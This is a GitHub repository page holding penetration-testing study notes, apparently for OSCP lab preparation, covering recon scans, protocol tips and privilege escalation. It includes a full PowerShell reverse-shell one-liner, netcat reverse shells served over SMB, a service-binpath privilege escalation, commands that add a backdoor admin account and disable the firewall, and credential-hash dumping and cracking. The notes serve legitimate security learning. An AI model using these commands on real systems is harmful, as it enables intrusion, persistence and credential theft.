Skip to content

moshekaplan/pentesting_notes

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

119 Commits
OSCP_prep.md
OSCP_prep.md
 
 
README.md
README.md
 
 
_config.yml
_config.yml
 
 
index.md
index.md
 
 

Repository files navigation

Pull requests welcome.

Preparing your environment

Clone the following repositories:

Or as a list of commands:

git clone --depth 1 https://github.com/superkojiman/onetwopunch.git
git clone --depth 1 https://github.com/AutoRecon/AutoRecon.git
git clone --depth 1 https://github.com/codingo/Reconnoitre.git
git clone --depth 1 https://github.com/jivoi/pentest.git
git clone --depth 1 https://github.com/danielmiessler/SecLists.git
git clone --depth 1 https://github.com/mthbernardes/rsg.git
git clone --depth 1 https://github.com/rebootuser/LinEnum.git
git clone --depth 1 https://github.com/mzet-/linux-exploit-suggester.git
git clone --depth 1 https://github.com/TH3xACE/SUDO_KILLER.git
git clone --depth 1 https://github.com/M4ximuss/Powerless.git
git clone --depth 1 https://github.com/411Hall/JAWS.git
git clone --depth 1 https://github.com/PowerShellMafia/PowerSploit.git
git clone --depth 1 https://github.com/absolomb/WindowsEnum.git
git clone --depth 1 https://github.com/rasta-mouse/Sherlock.git
git clone --depth 1 https://github.com/ankh2054/windows-pentest.git
git clone --depth 1 https://github.com/SecWiki/windows-kernel-exploits.git
git clone --depth 1 https://github.com/51x/WHP.git
git clone --depth 1 https://github.com/AusJock/Privilege-Escalation.git
git clone --depth 1 https://github.com/3ndG4me/AutoBlue-MS17-010.git
git clone --depth 1 https://github.com/GDSSecurity/Windows-Exploit-Suggester.git

Starting a pentest

Beginning a pentest against a host? Start with the following commands:

nmap -A -sV --script=default,vuln,smb-vuln* -p- --open -oA tcp_10.11.1.x 10.11.1.x
nmap -A -sV -sU --script=default,vuln --open -oA udp_10.11.1.x 10.11.1.x
echo "10.11.1.x" > 10.11.1.x_target.txt && ~/Desktop/tools/onetwopunch.sh  -i tap0 -t 10.11.1.x_target.txt
python3 ~/Desktop/tools/AutoRecon/autorecon.py "10.11.1.x" -v -o  ~/Desktop/oscp

Searchsploit can run with nmap output: searchsploit --nmap tcp_10.11.1.x.xml

Ideally, your goal is to enumerate your attack surface in as much detail as possible: all exposed services, with full details (version, modules, and configuration)

Don't forget to try default creds. Not all scripts have useful console output. Wireshark may be useful for manually reviewing if auth is successful.

See https://guide.offsecnewbie.com/general-methodology

Protocol specific notes

FTP

  • Scan for anonymous access
  • Filezilla fails to connect if the directory listing isn't allowed.
  • Always use binary mode when transferring files
  • FTP command line reference:
Connect: ftp <ip>
Binary mode:   binary
List files:    ls
Change dir:    cd
Download file: get <file>
Upload file:   put <file>

HTTP

HTTP consists of several components:

  • Web server
  • Programming language (if any)
  • Back-end platform/framework (Drupal, Wordpress, etc.) and plugins
  • Front-end UI

Other notes:

  • Each component has its own vulnerabilities. Front-end vulns are useful for XSS and the like.
  • A web server listens on one or more ports. It can also run multiple languages and multiple frameworks at different paths.

Web Servers:

  • Apache, nginx, and Microsoft IIS are most common.
  • Less-common webservers are more likely to have vulnerabilities and misconfigurations

Web scanners:

  • nikto to scan for vulns: nikto -h [IP] -p [PORT] -o "[OUTPUT].txt"
  • whatweb to detect versions: whatweb --aggression 2 www.example.com
  • gobuster to enumerate directories. gobuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.11.1.x:80
    • If you know you can create files on a web server, but aren't sure where they are, bruteforcing is acceptable
    • Recommended wordlists: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and /usr/share/seclists/Discovery/Web-Content/common.txt

Coldfusion

Colfusion guide: https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers

Wordpress

wpscan --url www.example.com

LDAP

  • nmap -p 389 --script ldap-rootdse -Pn 1.2.3.4
  • nmap -p 389 --script ldap-search -Pn 1.2.3.4
  • ldapsearch -x -h 1.2.3.4 -s base namingcontexts
  • ldapsearch -x -h 1.2.3.4 -b "dc=lightweight,dc=htb"

SMB

For Linux targets running SMB, it may be possible to find a version number in the raw network traffic with Wireshark in the smb.native_lanman field.

Lessons Learned

Exploitation

If an exploit looks like it should be succesful, but is failing to connect back with a reverse shell, try cycling through common ports: 80, 443, 8080, 53

Try using other payloads besides reverse shell, if the exploit works. Adding an admin/root user and connecting via SSH/RDP is an alternative to an immediate root shell.

General Privilege escalation

Concepts:

Ports for reverse shell

Trying to figure out if a port is available for further connect-back? Try nmap + wireshark

On compromised host, run: nmap -sV -P0 -p- 10.11.0.57

On attacker system, use the following wireshark filter: ip.src == 10.11.1.252 && tcp.flags.syn == 1 && tcp.flags.ack == 0

Lazy credentials

If you see lazy passwords in one place of admin/admin, expect that there might be lazy passwords in other places too.

Windows Privilege escalation

  • accesschk.exe /accepteula -c * for seeing services with RW access, so the service image path itself can be changed.
  • https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • Sometimes files may be hidden. Use dir /A instead of dir.
  • https://guif.re/windowseop
  • Show user information: net user username
  • Show information on group: net localgroup administrators
  • May have stored credentials: cmdkey /list
    • Escalate with: runas /user:ACCESS\Administrator /savecred "command"
  • Windows reverse shell: $client = New-Object System.Net.Sockets.TCPClient("10.10.12.84",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Run/Transfer/Exfil files with SMB:

SMB server on Kali box is easiest way to run/transfer/exfil files.

  • Start SMB server: python /usr/share/doc/python-impacket/examples/smbserver.py -smb2support share /www
    • Note: Some Windows hosts are locked down and only allow SMB2
  • Copy file: COPY \\10.10.12.84\share\PowerUp.ps1 PowerUp.ps1
  • Run command: \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

Second shell

After getting a shell, get a second shell with "start" in case the first one bugs up/hangs/crashes (assuming running SMB server): victim > start \\10.10.12.84\share\nc.exe -nv -e cmd.exe 10.10.12.84 80

XP SP1 (and earlier) privesc via upnphost:

sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.X 5555 -e C:\Windows\system32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc config upnphost depend= ""
sc qc upnphost

Windows privesc enumeration scripts

Windows commands to run as root:

  • Add new admin: net user hacker Winter2019! /add && net localgroup administrators hacker /add && net group administrators hacker /add
  • Disable windows firewall: NetSh Advfirewall set allprofiles state off

Windows Privesc online resources

Linux Privilege escalation

Concepts

Scripts

  • LinEnum.sh -t -s

General Guidance

Post-rooting activities

  • Dump and crack hashes
    • Linux:
      • Dump: cat /etc/shadow or cat /etc/shadow
      • Crack:
    • Windows:
      • Dump hashes #1: wce32.exe -w or wce64.exe -w
      • Dump hashes #2: fgdump.exe && type *.pwdump
      • Crack with: https://hashkiller.co.uk/Cracker/NTLM
      • Or: john ./hashes.txt --format=nt --wordlist=/usr/share/wordlists/rockyou.txt
      • Or: hashcat -m 1000 hash.pwd /usr/share/wordlists/rockyou.txt --force
  • Look for interesting files only accessible to root/admin
    • Sensitive files in Desktop or Documents
    • Backup files
    • Sensitive data in Windows Registry

Transferring files:

Writing Exploits:

Online Resources

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

37 stars

Watchers

4 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published